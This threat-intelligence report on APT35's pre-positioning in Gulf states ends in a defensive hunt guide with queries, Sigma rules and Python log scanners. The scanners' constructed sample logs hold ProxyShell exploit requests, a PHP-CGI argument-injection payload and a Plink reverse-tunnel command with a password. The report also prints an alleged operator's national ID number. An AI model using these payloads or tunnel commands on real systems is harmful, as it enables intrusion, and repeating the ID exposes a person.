Every Country Iran Bombed Had Already Been Mapped
On February 28, 2026, Iran launched Operation Epic Fury: simultaneous ballistic missile and drone strikes against seven countries: Jordan, the UAE, Saudi Arabia, Kuwait, Bahrain, Qatar, and Israel [1]. The operation was a retaliatory response following the death of Supreme Leader Khamenei and the collapse of Iran's internet connectivity to roughly 4% of normal capacity [1]. What makes this kinetic campaign a subject for cyber threat intelligence is what came before it. According to CloudSEK's analysis of the KittenBusters intelligence leak, every Gulf country subsequently struck by Iran had previously appeared in documented APT35 targeting, reconnaissance, or compromise activity [2].
This wasn't coincidence. CloudSEK's report states the alignment between cyber reconnaissance and later kinetic targeting is "too consistent to dismiss as coincidence" [1]. APT35, also known as Charming Kitten, had spent years building persistent access across critical infrastructure in these nations. When the missiles flew, the digital maps were already drawn.
APT35 and the IRGC Connection
APT35 is linked directly to Iran's Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization, specifically Unit 1500, Department 40 [1]. The KittenBusters leak, posted to GitHub in 2025, includes hundreds of files spanning attack reports, daily operational logs, internal communications, malware samples, and even personnel photographs [3]. The leak identified Abbas Rahrovi (Iranian national ID 4270844116) as the operation leader [3].
This is a group with documented operations stretching back over a decade. Their tooling ranges from commodity webshells to custom-built implants designed to evade specific antivirus products. APT35 has documented AV bypass research against Microsoft Defender, Kaspersky, and ESET [1]. The KittenBusters leak transformed what was previously circumstantial attribution into concrete evidence: countries and organizations on APT35's targeting lists now have documented proof tying intrusions to named IRGC personnel [3].
Pre-Positioning Across the Gulf
The scope of APT35's pre-positioning campaign covered critical sectors across all seven target nations. CloudSEK's analysis shows pre-positioned access in Jordan, the UAE, Saudi Arabia, Kuwait, Bahrain, Qatar, and Israel before the February 28 strikes [1].
Specific compromises identified in the leak include:
- Jordan: The Ministry of Justice was breached as part of Operation Desert Breach, active from 2024 to present. Civil aviation infrastructure was also compromised [2][4]. Over 74 GB of data was exfiltrated from Jordan operations alone [4].
- UAE: Aviation-related systems and government assets appear in the leaked data [2].
- Saudi Arabia: Energy sector infrastructure was targeted, culminating in the deployment of Shamoon 4.0 wiper malware on January 24, 2026, which wiped 15,000 Saudi energy workstations [1]. That attack occurred just five weeks before the kinetic strikes.
- Afghanistan (not among the seven countries struck, but part of the same leaked operational set): Operation Afghan Infiltration targeted telecommunications providers and government ministries [4].
The pattern is clear. APT35 wasn't conducting opportunistic espionage. The group was building a comprehensive targeting package: mapping networks, documenting backup systems, profiling defensive gaps, and maintaining persistent access so that intelligence could be pulled in real-time when operational planners needed it.
Initial Access: Old CVEs, Still Effective
APT35 relied heavily on known vulnerabilities for initial access. The ProxyShell vulnerability chain (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473) enabled remote code execution on Microsoft Exchange servers and served as a primary entry vector [6]. These vulnerabilities were first revealed at the Pwn2Own contest in Vancouver in April 2021 and have been exploited by APT35 to deploy multiple webshells post-compromise [6].
In Jordan's Operation Desert Breach, the group exploited CVE-2012-1823, the PHP-CGI argument-injection flaw that lets an attacker pass php-cgi command-line options through the URL query string and achieve remote code execution [4]. That CVE is from 2012. A vulnerability more than a decade old providing access to a Ministry of Justice network says a great deal about the state of patch management in the targeted environments.
Persistence: BellaCiao and Custom Webshells
Once inside, APT35 deployed BellaCiao, a C#/.NET implant that installs itself as a Windows service and drops a webshell for persistence [1][5]. BellaCiao's tasking channel is DNS: roughly every 24 hours it resolves a victim-specific subdomain and derives its instructions from the address that comes back, rather than fetching a conventional payload [5]. The dropped webshell watches incoming web requests for a particular string in a header that acts as a secret password, and then offers file download, upload, and command execution [5]. Because tasking rides on DNS and the webshell sits among legitimate web traffic, neither channel stands out under ordinary HTTP inspection.
The group also deployed a Python-based webshell framework for managing multiple compromised hosts simultaneously [1], along with Plink (PuTTY's command-line SSH client) for establishing reverse tunnels out of compromised networks [5].
Custom Implants: Sagheb RAT
APT35's more advanced operations used Sagheb RAT, a native code implant described as a "FUD keylogger" (fully undetectable) that routes communications through TOR [1]. Sagheb steals Firefox browser credentials and Telegram session data [1], providing both communications intelligence and credential harvesting in a single package. The TOR routing makes network-level detection significantly harder.
Destructive Capability: Shamoon 4.0
The January 24, 2026 deployment of Shamoon 4.0 against Saudi energy infrastructure represents the transition from espionage to sabotage [1]. Wiping 15,000 workstations in a single operation required the kind of extensive network knowledge that years of pre-positioned access provides: understanding of Active Directory structures, knowledge of which systems to target for maximum disruption, and credentials with sufficient privileges to push wiper payloads at scale.
IOC Table
| Type | Value | Context | Source |
|---|---|---|---|
| Malware | BellaCiao | C#/.NET webshell, Windows service persistence, DNS-based C2, tested against Defender/Kaspersky/ESET | [1][5] |
| Malware | Sagheb RAT | Native code keylogger, TOR-routed C2, steals Firefox and Telegram credentials | [1] |
| Malware | Shamoon 4.0 | Wiper deployed Jan 24, 2026 against Saudi energy sector (15,000 workstations) | [1] |
| Tool | Plink | PuTTY command-line SSH client used for reverse port forwarding through compromised hosts | [5] |
| CVE | CVE-2021-31207, CVE-2021-34523, CVE-2021-34473 | ProxyShell chain on Microsoft Exchange, primary initial access vector | [6] |
| CVE | CVE-2012-1823 | PHP-CGI argument injection exploited for RCE in Jordan operations | [4] |
MITRE ATT&CK Mapping
| Technique ID | Name | Context |
|---|---|---|
| T1190 | Exploit Public-Facing Application | ProxyShell (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473) and PHP-CGI (CVE-2012-1823) exploitation for initial access [4][6] |
| T1505.003 | Server Software Component: Web Shell | BellaCiao and Python webshell framework deployed post-compromise for persistent access [1][5] |
| T1543.003 | Create or Modify System Process: Windows Service | BellaCiao installs itself as a Windows service for persistence [5] |
| T1071.004 | Application Layer Protocol: DNS | BellaCiao resolves a victim-specific subdomain on a 24-hour cycle for tasking [5] |
| T1082 | System Information Discovery | Extensive infrastructure mapping, SCADA identification, backup system documentation across GCC targets [1] |
| T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | Sagheb RAT harvests Firefox saved logins; its Telegram session theft maps to the parent T1555 [1] |
| T1566 | Phishing | Spear-phishing campaigns for credential harvesting [1] |
| T1572 | Protocol Tunneling | Plink reverse SSH tunnels (-R) through compromised hosts [5] |
| T1090.003 | Proxy: Multi-hop Proxy | Sagheb RAT routes C2 through TOR [1] |
| T1485 | Data Destruction | Shamoon 4.0 wiper against Saudi energy workstations [1] |
Detection and Hunting
DNS-Based C2 Detection: BellaCiao's 24-hour DNS beacon pattern is its most detectable behavior. Hunt for anomalous DNS queries originating from Exchange servers or web-facing hosts. Look for consistent, periodic subdomain queries to low-reputation or recently registered domains. A SIEM query that filters DNS requests from Exchange server IPs and keeps only names resolved exactly once per day will surface candidates; expect legitimate daily jobs (update checks, licensing pings) to match as well, so triage candidates by domain age and reputation rather than treating the cadence alone as a verdict.
Exchange Server Webshell Hunting: ProxyShell remains APT35's go-to entry point [6]. Sweep all Exchange servers for unexpected .aspx files under the FrontEnd\HttpProxy\owa\auth and ecp\auth directories and under inetpub\wwwroot\aspnet_client, the usual drop locations after ProxyShell. BellaCiao's webshell authenticates via a secret string in an HTTP header [5], but IIS does not log custom request headers by default, so either add the header as a custom logging field or capture it at the reverse proxy or WAF; otherwise hunt the IIS logs for POST requests to recently created .aspx paths instead. Microsoft's HealthChecker.ps1 script reports Exchange servers missing the ProxyShell security updates.
Plink and Reverse Proxy Indicators: Monitor for plink.exe execution on servers where PuTTY shouldn't be installed. Process creation logs (Sysmon Event ID 1) filtering for plink.exe with command-line arguments containing -R (remote port forwarding) will catch most reverse proxy activity [5].
TOR Network Connections: Sagheb RAT uses TOR for C2 [1]. A Tor client connects to guard and middle relays, never to an exit node, so the Tor Project's bulk exit list is the right feed for spotting anonymised inbound traffic and the wrong one for catching an internal host running Tor. For outbound detection use a full relay list (the consensus, or Onionoo relay data) and alert on any internal host connecting to a relay's OR address and port; block exit addresses inbound. Bridges and pluggable transports appear in neither list, so treat an empty result as absence of evidence only.
Shamoon Precursors: The Shamoon 4.0 deployment required significant prior access [1]. Hunt for signs of lateral movement in energy sector OT/IT boundary networks: unusual SMB authentication patterns, credential usage from unexpected hosts, and scheduled task creation on multiple endpoints within short timeframes.
Analysis
The CloudSEK report makes the cyber-to-kinetic pipeline explicit in a way previous analyses only hinted at. APT35's operations across the Gulf weren't just intelligence collection. They were target development in the military sense: identifying critical nodes, documenting vulnerabilities, mapping dependencies, and maintaining access so targeting data would be current when needed.
The Shamoon 4.0 deployment on January 24, 2026, exactly 35 days before Operation Epic Fury, likely served a dual purpose [1]. It degraded Saudi energy sector operational visibility right before the kinetic campaign, and it tested whether pre-positioned access was still viable. The fact that 15,000 workstations were wiped in a single operation confirms that access was deep and credentials were current.
The exploitation of CVE-2012-1823 in Jordan operations is particularly telling [4]. A vulnerability from 2012 provided access to justice ministry systems in 2024. This suggests APT35 is methodical about testing old vulnerabilities against targets that may have limited patching resources, and that many GCC-region organizations remain exposed to basic exploitation.
For the US and allied critical infrastructure operators, this intelligence has direct relevance. BellaCiao has been used against US seaports and energy companies [5]. The same reconnaissance-to-targeting methodology could apply to any nation-state adversary mapping infrastructure for future contingencies.
Red Sheep Assessment
Confidence: High (based on named sources, leaked operational documents, and temporal correlation between cyber activity and kinetic strikes)
The KittenBusters leak transforms APT35's pre-positioning campaign from an analytical inference into a documented fact. The leaked operational logs, personnel data, and targeting lists provide the kind of ground truth that threat intelligence rarely achieves. When CloudSEK states the overlap between cyber reconnaissance and kinetic targeting is too consistent for coincidence, they're understating it: the leak shows this was a deliberate, integrated intelligence pipeline.
What the sources collectively suggest but don't explicitly state is that APT35's pre-positioning likely served as a contingency plan activated under crisis conditions. The death of Khamenei and the near-total internet blackout in Iran created a scenario where pre-staged access became the primary intelligence source, not a supplement. The group's years of patient access maintenance paid off precisely because traditional collection methods were degraded.
A secondary assessment: the 74 GB exfiltrated from Jordan alone [4] suggests data volumes across all seven target countries could be enormous. The full scope of what APT35 collected, and what Iranian military planners used for targeting, probably extends well beyond what CloudSEK has published. Organizations in the affected countries should assume compromise even without specific notification.
The contrarian read is that APT35's reconnaissance was standard espionage and the kinetic targeting correlation is post-hoc reasoning. We reject this interpretation. The Shamoon 4.0 deployment five weeks before the strikes, the documented AV bypass research, and the focus on infrastructure backup systems all point toward operational preparation, not passive intelligence collection.
Defender's Checklist
- [ ] Audit all Exchange servers for the ProxyShell patches (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473). Get-ExchangeServer | Format-Table Name, AdminDisplayVersion shows only the Cumulative Update, not the Security Update, so read the ExSetup.exe file version on each server with Get-Command ExSetup.exe | ForEach-Object {$_.FileVersionInfo.FileVersion} (or run Microsoft's HealthChecker.ps1) and cross-reference against the patched build numbers. Any unpatched instance in a GCC-region or critical infrastructure network should be treated as assumed-compromised [6].
- [ ] Hunt for BellaCiao DNS beaconing by querying DNS logs for names resolved exactly once per day from web-facing servers: index=dns src_ip IN (exchange_server_ips) | bucket span=1d _time | stats count by src_ip, query, _time | where count=1 | stats dc(_time) as days by src_ip, query | where days >= 25 (one query per day over a 30-day window, with slack for reboots) [5].
- [ ] Scan for the PHP-CGI vulnerability (CVE-2012-1823) on any internet-facing application that runs PHP as CGI (mod_php and PHP-FPM do not pass the query string to argv and are not affected). Run php-cgi -v on each web server and flag anything below 5.3.13 or 5.4.3: the first fix (5.3.12 / 5.4.2) was incomplete and was completed as CVE-2012-2311 [4].
- [ ] Block TOR connections at the perimeter using regularly updated relay lists from the TOR Project; exit-node lists cover inbound traffic, while outbound detection needs guard and relay addresses. Alert on any internal host attempting TOR connections as a Sagheb RAT indicator [1].
- [ ] Review Windows service installations on Exchange and web servers from the past 12 months. BellaCiao persists as a Windows service [5]. Query: Get-CimInstance Win32_Service | Where-Object {$_.StartMode -eq 'Auto' -and $_.PathName -notmatch '\\Windows\\' -and $_.PathName -notmatch 'Microsoft\\Exchange Server'} | Select-Object Name, PathName, StartName to surface auto-start services that do not run from the Windows or Exchange install trees, then verify each binary's publisher signature with Get-AuthenticodeSignature.
References
- [1] CloudSEK, "Kitten Had the Map all Along: RAISING GCC TENSIONS & THE PRE-POSITIONING MAP," https://www.cloudsek.com/blog/kitten-had-the-map-all-along-raising-gcc-tensions-the-pre-positioning-map
- [2] ITNerd Blog, "Iranian Cyber Group APT35 Had Already Mapped Every Country Bombed in Operation Epic Fury," https://itnerd.blog/2026/04/09/iranian-cyber-group-apt35-had-already-mapped-every-country-bombed-in-operation-epic-fury/
- [3] Nariman Gharib Blog, "Massive Leak Exposes Inner Workings of Iranian Hacking Group Charming Kitten," https://blog.narimangharib.com/posts/2025/09/1759266283738?lang=en
- [4] Gatewatcher, "Data breach: the operations of Charming Kitten revealed," https://www.gatewatcher.com/en/lab/data-breach-the-operations-of-charming-kitten-revealed/
- [5] CSO Online, "Iranian cyberspies deploy new malware implant on Microsoft Exchange Servers," https://www.csoonline.com/article/575183/iranian-cyberspies-deploy-new-malware-implant-on-microsoft-exchange-servers.html
- [6] SOC Prime, "APT35 Using ProxyShell Vulnerabilities to Deploy Multiple WebShells," https://socprime.com/blog/apt35-using-proxyshell-vulnerabilities-to-deploy-multiple-webshells/
---
Hunt Guide: Hunt Report: APT35 Pre-Positioning and Infrastructure Mapping Campaign
Hypothesis: If APT35 (Charming Kitten) is active in our environment, we expect to observe ProxyShell exploitation attempts, BellaCiao DNS beaconing patterns, Sagheb RAT TOR communications, and reconnaissance activities targeting critical infrastructure in Windows Security logs, DNS logs, web server logs, and network traffic.
Intelligence Summary: APT35, linked to Iran's IRGC Unit 1500, conducted multi-year pre-positioning campaigns across Gulf states that directly correlated with kinetic strikes during Operation Epic Fury. The group exploited ProxyShell and legacy PHP vulnerabilities, deployed BellaCiao webshells with DNS C2, and used Shamoon 4.0 wipers against Saudi energy infrastructure, demonstrating a cyber-to-kinetic targeting pipeline.
Confidence: High | Priority: Critical
Scope
- Networks: All Exchange servers, web-facing infrastructure, domain controllers, and OT/IT boundary systems
- Timeframe: Retrospective hunt over all available log retention, prioritising January 2024 to present (the start of Operation Desert Breach); 90 days is the minimum useful window, since a 24-hour beacon needs weeks of data before its cadence is visible
- Priority Systems: Exchange servers (CVE-2021-31207/34523/34473 vulnerable), PHP applications (CVE-2012-1823), energy sector SCADA/HMI systems, backup infrastructure
MITRE ATT&CK Techniques
T1190 — Exploit Public-Facing Application (Initial Access) [P1]
APT35 exploits ProxyShell chain (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473) on Exchange servers and PHP-CGI (CVE-2012-1823) for initial access
Splunk SPL:
index=* (sourcetype=iis OR sourcetype=MSExchange*) ("autodiscover/autodiscover.json" OR "X-Rps-CAT" OR "/powershell" OR "Email=autodiscover") | search status=200 | stats count by src_ip, uri_path | where count > 5
Elastic KQL:
event.dataset:(iis.access OR exchange.*) AND (url.path:*autodiscover.json OR url.query:*X-Rps-CAT* OR url.query:*Email=autodiscover* OR url.path:*powershell*) AND http.response.status_code:200
Sigma Rule (the original condition excluded status 200 responses, which dropped every successful exploitation; it now keys on the query-string markers that ordinary Autodiscover traffic never carries):
```yaml
title: ProxyShell Exchange Exploitation Attempt
author: cloudsek
status: experimental
description: Detects ProxyShell path-confusion and forged-token requests against the Exchange front-end IIS
references:
  - https://www.csoonline.com/article/575183/iranian-cyberspies-deploy-new-malware-implant-on-microsoft-exchange-servers.html
  - https://socprime.com/blog/apt35-using-proxyshell-vulnerabilities-to-deploy-multiple-webshells/
logsource:
  category: webserver
detection:
  selection_path:
    cs-uri-stem|contains: '/autodiscover/autodiscover.json'
  selection_query:
    cs-uri-query|contains:
      - 'Email=autodiscover/autodiscover.json'
      - 'X-Rps-CAT='
      - '/mapi/nspi'
  condition: selection_path and selection_query
falsepositives:
  - Legitimate Autodiscover requests (these never carry Email=autodiscover or X-Rps-CAT in the query string)
level: high
tags:
  - attack.initial_access
  - attack.t1190
```
Focus on Exchange servers with external exposure. Check for rapid sequential requests to multiple ProxyShell URIs from same source IP.
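The two initial-access patterns described in this hunt and in the Initial Access section above, ProxyShell path confusion on Exchange and PHP-CGI argument injection (CVE-2012-1823), can be checked directly against web server logs. The following is an added example written for this page, not code from CloudSEK, the hunt guide, or any vendor. It parses IIS W3C lines (default field order) and Apache combined lines, names the ProxyShell stage each request belongs to, flags php-cgi argument injection, and raises one finding per source IP that reaches two or more chain stages within ten minutes. The log lines are constructed for the demo (evil.test, 203.0.113.x and 198.51.100.x are documentation addresses), both timestamps are assumed to be UTC, and the user-agent fields are assumed to carry no spaces, as IIS encodes them.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote_plus

# IIS W3C default field order; a real log's #Fields: header names them.
IIS_FIELDS = ["date", "time", "s_ip", "method", "stem", "raw_query", "s_port", "user",
              "c_ip", "ua", "referer", "status", "substatus", "win32", "time_taken"]
# Apache combined format: client, ident, user, [time], "METHOD target PROTO", status ...
APACHE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Normalise one IIS W3C or Apache combined line; both timestamps assumed UTC."""
    if not line.strip() or line.startswith("#"):
        return None
    m = APACHE_RE.match(line)
    if m:
        src, ts, method, target, status = m.groups()
        stem, _, raw_query = target.partition("?")
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
        return {"ts": when, "src": src, "method": method, "stem": stem,
                "raw_query": raw_query, "status": int(status)}
    parts = line.split(" ")
    if len(parts) < len(IIS_FIELDS):
        return None
    rec = dict(zip(IIS_FIELDS, parts))
    return {"ts": datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S"),
            "src": rec["c_ip"], "method": rec["method"], "stem": rec["stem"],
            "raw_query": "" if rec["raw_query"] == "-" else rec["raw_query"],
            "status": int(rec["status"])}


def proxyshell_stage(rec):
    """Name the ProxyShell stage a request belongs to, or None."""
    stem = rec["stem"].lower()
    q = unquote_plus(rec["raw_query"]).lower()
    if "x-rps-cat=" in q:
        return "powershell_rps"                 # CVE-2021-34523: backend PowerShell with forged token
    if stem.endswith("/autodiscover/autodiscover.json") and "email=autodiscover/autodiscover.json" in q:
        return "autodiscover_path_confusion"   # CVE-2021-34473: pre-auth path confusion
    if "/mapi/nspi" in q:
        return "mapi_nspi"                      # backend reached through the confused path
    return None


def php_cgi_injection(rec):
    """CVE-2012-1823: php-cgi copies the query string into argv only when it contains no
    literal '=', so exploits encode '=' as %3d and open with an option such as -s or -d."""
    raw = rec["raw_query"]
    if not raw or "=" in raw:
        return False
    return unquote_plus(raw).lstrip().startswith("-")


def scan(lines, window=timedelta(minutes=10), min_stages=2):
    """Return every PHP-CGI injection plus one ProxyShell finding per source that hits
    at least min_stages distinct chain stages inside the window."""
    findings, stages_by_src = [], defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if php_cgi_injection(rec):
            findings.append({"type": "php_cgi_arg_injection", "src": rec["src"], "ts": rec["ts"],
                             "query": unquote_plus(rec["raw_query"]), "status": rec["status"]})
        stage = proxyshell_stage(rec)
        if stage:
            stages_by_src[rec["src"]].append((rec["ts"], stage))
    for src, events in stages_by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            seen = {s for t, s in events[i:] if t - t0 <= window}
            if len(seen) >= min_stages:
                findings.append({"type": "proxyshell_chain", "src": src, "ts": t0, "stages": sorted(seen)})
                break
    return findings


# Constructed sample log lines, not real traffic: two IIS ProxyShell stages from one source,
# a benign OWA logon, an Apache php-cgi argument injection, and a benign PHP request.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2026-01-12 03:14:05 10.0.0.5 GET /autodiscover/autodiscover.json @evil.test/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@evil.test 443 - 203.0.113.7 python-requests/2.31 - 200 0 0 41
2026-01-12 03:14:09 10.0.0.5 POST /autodiscover/autodiscover.json @evil.test/powershell/?X-Rps-CAT=AAAA&Email=autodiscover/autodiscover.json%3F@evil.test 443 - 203.0.113.7 python-requests/2.31 - 200 0 0 220
2026-01-12 03:20:00 10.0.0.5 GET /owa/auth/logon.aspx url=https%3a%2f%2fmail.example.test%2fowa 443 - 198.51.100.20 Mozilla/5.0 - 200 0 0 12
203.0.113.9 - - [15/Jan/2026:22:03:11 +0000] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "curl/8.4"
198.51.100.21 - - [15/Jan/2026:22:05:40 +0000] "GET /index.php?page=home&lang=en HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

The php-cgi check deliberately looks at the raw, undecoded query: a query containing a literal `=` is never handed to argv, which is exactly why the public exploit encodes `=` as `%3d`, so a decoded-only check would miss the real thing and flag harmless `?-foo=bar` strings. The ProxyShell correlation counts distinct stages rather than raw request volume, so a scanner that hammers only the Autodiscover URI produces no chain finding while a two-request exploitation does.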
T1505.003 — Server Software Component: Web Shell (Persistence) [P1]
BellaCiao webshell installed as Windows service with DNS-based C2 beaconing every 24 hours
Splunk SPL:
index=* sourcetype="WinEventLog:System" EventCode=7045 NOT ImagePath="*\\Windows\\*" NOT ImagePath="*\\Microsoft\\Exchange Server\\*" | table _time, host, ServiceName, ImagePath, AccountName, StartType
Elastic KQL:
event.code:7045 AND NOT winlog.event_data.ImagePath:*Windows* AND NOT winlog.event_data.ImagePath:*Exchange\ Server* (KQL is a filter language; aggregate the results per host in Lens or Discover and review every service whose binary lives outside the Windows and Exchange install trees)
Sigma Rule (the original matched ImagePath on '.aspx' or '.dll', which real service binaries do not carry; the rule now baselines on install location instead):
```yaml
title: Suspicious Service Installed on Exchange or Web Server
author: Unknown
status: experimental
description: BellaCiao persists as a Windows service; surface 7045 installs whose binary lives outside the Windows and Exchange install trees
logsource:
  product: windows
  service: system
detection:
  selection:
    Provider_Name: 'Service Control Manager'
    EventID: 7045
  filter_known_paths:
    ImagePath|contains:
      - '\Windows\'
      - '\Microsoft\Exchange Server\'
  condition: selection and not filter_known_paths
falsepositives:
  - Legitimate agent or web application services; baseline per host role
level: high
tags:
  - attack.persistence
  - attack.t1543.003
  - attack.t1505.003
```
Correlate service creation with DNS beaconing patterns. BellaCiao uses consistent 24-hour intervals.
T1071.004 — Application Layer Protocol: DNS (Command and Control) [P1]
BellaCiao uses DNS queries to specific subdomains every 24 hours for C2 communication
Splunk SPL:
index=dns [search index=* sourcetype="WinEventLog:System" EventCode=7045 | dedup host | eval src_ip=host_ip | fields src_ip] | bucket span=1d _time | stats count by src_ip, query, _time | where count=1 | stats dc(_time) as day_count by src_ip, query | where day_count >= 3
Elastic (KQL cannot aggregate, so the periodicity step is ES|QL):
FROM logs-* | WHERE event.dataset == "dns" | EVAL day = DATE_TRUNC(1 day, @timestamp) | STATS c = COUNT(*) BY source.ip, dns.question.registered_domain, day | WHERE c == 1 | STATS days = COUNT(*) BY source.ip, dns.question.registered_domain | WHERE days >= 3
Look for DNS queries from web servers that occur exactly once per 24-hour period to low-reputation domains
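The SIEM queries above count "one query per day", which misses a beacon that drifts across midnight and is fooled by a host that was powered off for a day. The following is an added example, written for this page and not taken from the hunt guide or from CloudSEK, that tests the cadence directly from DNS records; it also serves the DNS-Based C2 Detection paragraph in the article above. It groups records by (source IP, registered domain), collapses resolver retry bursts, and reports a pair when every gap between observations sits on the 24-hour grid (any integer multiple, so a missed day still counts) within a jitter tolerance. Record tuples and domain names are constructed; the field order (timestamp, source IP, query name) is an assumption about the export format.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median


def registered_domain(qname, depth=2):
    """Crude registrable domain: the last `depth` labels. Production code should use
    the public suffix list so that host.example.co.uk is not reduced to co.uk."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-depth:])


def find_periodic(records, period=timedelta(hours=24), tolerance=0.05,
                  min_observations=3, dedupe=timedelta(minutes=5)):
    """records: iterable of (timestamp, src_ip, qname).
    A (src, domain) pair is reported when every gap between observations lies within
    `tolerance` of k * period for some k >= 1, after collapsing retry bursts."""
    series = defaultdict(list)
    for ts, src, qname in records:
        series[(src, registered_domain(qname))].append(ts)
    hits = []
    for (src, domain), times in series.items():
        times.sort()
        collapsed = [times[0]]
        for t in times[1:]:
            if t - collapsed[-1] > dedupe:      # retries within 5 min are one observation
                collapsed.append(t)
        if len(collapsed) < min_observations:
            continue
        gaps = [b - a for a, b in zip(collapsed, collapsed[1:])]
        residuals = []
        for g in gaps:
            k = max(1, round(g / period))       # nearest multiple of the period
            residuals.append(abs((g - k * period).total_seconds()))
        if max(residuals) > period.total_seconds() * tolerance:
            continue
        hits.append({"src": src, "domain": domain, "observations": len(collapsed),
                     "median_gap_h": round(median(g.total_seconds() for g in gaps) / 3600, 2),
                     "max_jitter_s": int(max(residuals))})
    return hits


# Constructed DNS records (timestamp, source IP, query name), not from any real log.
BASE = datetime(2026, 2, 1, 2, 0, 3)
SAMPLE = [
    (BASE, "10.0.0.5", "a1.cdn-update.test"),
    (BASE + timedelta(seconds=1), "10.0.0.5", "a1.cdn-update.test"),             # resolver retry
    (BASE + timedelta(hours=24, seconds=10), "10.0.0.5", "a1.cdn-update.test"),
    (BASE + timedelta(hours=48, seconds=-7), "10.0.0.5", "a1.cdn-update.test"),
    (BASE + timedelta(hours=96, seconds=3), "10.0.0.5", "a1.cdn-update.test"),   # day 3 missed
    (BASE, "10.0.0.9", "www.example.test"),                                      # ordinary browsing
    (BASE + timedelta(hours=5), "10.0.0.9", "www.example.test"),
    (BASE + timedelta(hours=31), "10.0.0.9", "www.example.test"),
]

if __name__ == "__main__":
    for hit in find_periodic(SAMPLE):
        print(hit)
```

A legitimate daily job (update checks, licence pings, backup agents) produces exactly the same shape, so the output is a candidate list to triage by domain age, registrar, and whether the host has any business reason to resolve that name; the jitter figure helps, since malware timers drift by seconds while scheduled tasks drift by the host's clock.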
T1572 — Protocol Tunneling (Command and Control) [P2]
Sagheb RAT uses TOR for C2 communication; Plink used for reverse proxy tunneling
Splunk SPL:
index=* ((sourcetype=sysmon EventCode=1 ((Image="*\\plink.exe" CommandLine="* -R *") OR Image="*\\tor.exe")) OR (sourcetype=firewall [| inputlookup tor_relays.csv | fields dest_ip]))
Elastic KQL:
(process.name:plink.exe AND process.args:"-R") OR process.name:tor.exe OR destination.ip:(<relay addresses from the Tor consensus or Onionoo, maintained as a list>)
Sigma Rule (a plain CommandLine|contains '-R' is case-insensitive in Sigma and also matches Plink's -restrict-acl switch, so the rule anchors on the -R token):
```yaml
title: Plink Reverse Port Forwarding
author: Unknown
status: experimental
description: Detects Plink execution with a remote (reverse) port-forwarding argument
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\plink.exe'
    CommandLine|re: '(^|\s)-R\s'
  condition: selection
falsepositives:
  - Legitimate administrative use of Plink reverse tunnels
level: high
tags:
  - attack.command_and_control
  - attack.t1572
```
Match outbound connections against a full Tor relay list (guards and middles, not only exits) and block exit addresses inbound. Alert on any plink.exe execution on servers; the port-based firewall terms above are a weak fallback, since relays listen on arbitrary ports including 443.
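Plink's command line tells the analyst what the tunnel does, which the Sigma rule above cannot: where the listener is, what it forwards to, whether the session was unattended (-N with -batch) and whether a password was passed on the command line. The following is an added example written for this page, not code from the hunt guide or from PuTTY, that parses a Sysmon-style CommandLine for plink.exe and scores it. The switches it recognises are documented Plink options; the sample command lines are constructed (203.0.113.5 and 10.0.0.20 are documentation addresses).

```python
import shlex

# Documented Plink switches that consume the following token.
TAKES_VALUE = {"-P", "-l", "-i", "-pw", "-pwfile", "-m", "-hostkey", "-proxycmd", "-sercfg", "-nc"}
FORWARD_KEYS = {"-R": "reverse", "-L": "local", "-D": "dynamic"}


def parse_forward(spec):
    """'[listen_ip:]listen_port:dest_host:dest_port' -> dict (IPv4 / hostname form only)."""
    parts = spec.split(":")
    if len(parts) == 3:
        listen_ip, lport, host, dport = "*", *parts
    elif len(parts) == 4:
        listen_ip, lport, host, dport = parts
    else:
        return {"raw": spec}
    return {"listen": f"{listen_ip}:{lport}", "target": f"{host}:{dport}"}


def triage_plink(cmdline):
    """Return None if the image is not plink.exe, else a dict describing the tunnel."""
    try:
        # posix=False keeps Windows backslashes intact; quotes are then stripped by hand.
        toks = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:                      # unbalanced quotes in a mangled log line
        toks = cmdline.split()
    if not toks or not toks[0].lower().endswith("plink.exe"):
        return None
    info = {"reverse": [], "local": [], "dynamic": [], "remote": None,
            "no_shell": False, "batch": False, "password_on_cmdline": False}
    i = 1
    while i < len(toks):
        t = toks[i]
        if t in FORWARD_KEYS and i + 1 < len(toks):
            spec = toks[i + 1]
            info[FORWARD_KEYS[t]].append({"socks_port": spec} if t == "-D" else parse_forward(spec))
            i += 2
            continue
        if t == "-pw":
            info["password_on_cmdline"] = True
        if t in TAKES_VALUE:
            i += 2
            continue
        if t == "-N":
            info["no_shell"] = True
        elif t == "-batch":
            info["batch"] = True
        elif not t.startswith("-") and info["remote"] is None:
            info["remote"] = t              # first bare token is [user@]host
        i += 1
    score = (3 * bool(info["reverse"]) + 2 * bool(info["dynamic"]) + bool(info["local"])
             + (info["no_shell"] and info["batch"]) + info["password_on_cmdline"])
    info["severity"] = "high" if score >= 3 else "medium" if score >= 1 else "low"
    return info


# Constructed command lines as Sysmon Event ID 1 would record them.
SAMPLES = [
    r'"C:\Windows\Temp\plink.exe" -N -batch -R 0.0.0.0:3390:127.0.0.1:3389 -pw Hunter2 svc@203.0.113.5',
    r'"C:\Program Files\PuTTY\plink.exe" -ssh -i C:\keys\ops.ppk admin@10.0.0.20 uptime',
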